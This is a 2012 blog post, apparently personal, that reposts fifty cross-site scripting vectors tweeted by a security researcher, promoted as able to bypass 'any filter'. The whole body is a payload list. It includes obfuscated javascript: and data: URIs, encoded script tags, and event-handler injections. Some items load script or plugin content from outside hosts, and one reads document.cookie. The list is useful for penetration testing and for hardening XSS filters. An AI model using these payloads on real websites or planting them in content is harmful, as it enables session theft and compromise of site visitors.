Monday, 19 November 2012
50 Awesome XSS Vectors From @soaj1664ashar
Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. These fully baked vectors can be quite useful for bypassing any filter.
Or Grab from pastebin :)
50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these fully baked vectors :-)
1) <a href="javascript:\u0061le%72t(1)"><button>
2) <div onmouseover='alert(1)'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT:alert(1)">X</a>
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript:alert(document.cookie)>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript:\u0061le%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=<!-->
alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//
confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42) <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=data:text/javascript,alert(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x onerror=window.open('https://www.google.com/');>
46) <form><button formaction=javascript:alert(1)>CLICKME
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
Labels:
cross site scripting,
hacking,
web,
xss
2012-11-19T16:38:00+05:45
Cool Samar